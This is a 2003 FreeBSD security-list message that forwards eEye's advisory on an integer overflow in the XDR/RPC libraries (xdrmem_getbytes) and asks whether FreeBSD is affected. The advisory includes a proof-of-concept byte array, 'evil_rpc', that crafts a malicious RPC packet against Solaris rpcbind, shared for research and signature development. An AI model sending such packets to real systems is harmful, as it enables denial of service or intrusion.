Date: Wed, 19 Mar 2003 15:54:49 -0500 From: Mike Tancsa <mike@sentex.net> To: security@freebsd.org Subject: Fwd: EEYE: XDR Integer Overflow Message-ID: <5.2.0.9.0.20030319155420.080cbab8@marble.sentex.ca>
next in thread | raw e-mail | index | archive | help
Anyone know if this effects FreeBSD ? There is no mention in the CERT advisory. ---Mike >Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm >List-Id: <bugtraq.list-id.securityfocus.com> >List-Post: <mailto:bugtraq@securityfocus.com> >List-Help: <mailto:bugtraq-help@securityfocus.com> >List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com> >List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com> >Delivered-To: mailing list bugtraq@securityfocus.com >Delivered-To: moderator for bugtraq@securityfocus.com >From: "Marc Maiffret" <marc@eeye.com> >To: "BUGTRAQ" <BUGTRAQ@securityfocus.com> >Subject: EEYE: XDR Integer Overflow >Date: Wed, 19 Mar 2003 12:20:14 -0800 >X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) >Importance: Normal >X-Spam-Status: No, hits=0.6 required=7.0 > tests=DISCLAIMER,KNOWN_MAILING_LIST,SPAM_PHRASE_01_02, > TO_LOCALPART_EQ_REAL,USER_AGENT_OUTLOOK > version=2.43 >X-Virus-Scanned: by Sentex Communications (avscan1/20021227) > >XDR Integer Overflow > >Release Date: >March 19, 2003 > >Severity: >High (Remote Code Execution/Denial of Service) > >Systems Affected: > >Sun Microsystems Network Services Library (libnsl) >BSD-derived libraries with XDR/RPC routines (libc) >GNU C library with sunrpc (glibc) > >Description: > >XDR is a standard for the description and encoding of data which is used >heavily in RPC implementations. Several libraries exist that allow a >developer to incorporate XDR into his or her applications. Vulnerabilities >were discovered in these libraries during the testing of new Retina auditing >technologies developed by the eEye research department. > >ADAM and EVE are two technologies developed by eEye to remotely and locally >audit applications for the existence of common vulnerabilities. During an >ADAM audit, an integer overflow was discovered in the SUN Microsystems XDR >library. By supplying specific integer values in length fields during an RPC >transaction, we were able to produce various overflow conditions in UNIX RPC >services. > >Technical Description: > >The xdrmem_getbytes() function in the XDR library provided by Sun >Microsystems contains an integer overflow. Depending on the location and use >of the vulnerable xdrmem_getbytes() routine, various conditions may be >presented that can permit an attacker to remotely exploit a service using >this vulnerable routine. > >For the purpose of signature development and further security research a >sample session is included below that replicates an integer overflow in the >rpcbind shipped with various versions of the Solaris operating system. > >char evil_rpc[] = > >"\x23\x0D\xF6\xD2\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86" >"\xA0\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00" >"\x00\x20\x3D\xD2\xC9\x9F\x00\x00\x00\x09\x6C\x6F\x63\x61\x6C" >"\x68\x6F\x73\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" >"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x86" >"\xa0\x00\x00\x00\x02\x00\x00\x00\x04" >"\xFF\xFF\xFF\xFF" // RPC argument length >"EEYECLIPSE2003"; > >Vendor Status: > >Sun Microsystems was contacted on November 13, 2002 and CERT was contacted >shortly afterwards. Vendors believed to be vulnerable were contacted by CERT >during a grace period of several months. Due to some difficulties >communicating with vendors, after rescheduling several times a release date >was set for March 18, 2003. > >eEye recommends obtaining the necessary patches or updates from vendors as >they become available after the release of this and the CERT advisory. > >For a list of vendors and their responses, please review the CERT advisory >at: http://www.cert.org/advisories/CA-2003-10.html > >You can find the latest copy of this advisory, along with other eEye >research at http://www.eeye.com/. > >Credit: >Riley Hassell - Senior Research Associate > >Greetings: >Liver destroyers of the world: >Barnes (DOW!), FX, and last but definitely not least, Heather and Jenn. > >Copyright (c) 1998-2003 eEye Digital Security >Permission is hereby granted for the redistribution of this alert >electronically. It is not to be edited in any way without express consent of >eEye. If you wish to reprint the whole or any part of this alert in any >other medium excluding electronic medium, please e-mail alert@eEye.com for >permission. > >Disclaimer >The information within this paper may change without notice. Use of this >information constitutes acceptance for use in an AS IS condition. There are >NO warranties with regard to this information. In no event shall the author >be liable for any damages whatsoever arising out of or in connection with >the use or spread of this information. Any use of this information is at the >user's own risk. > >Feedback >Please send suggestions, updates, and comments to: > >eEye Digital Security >http://www.eEye.com >info@eEye.com -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?5.2.0.9.0.20030319155420.080cbab8>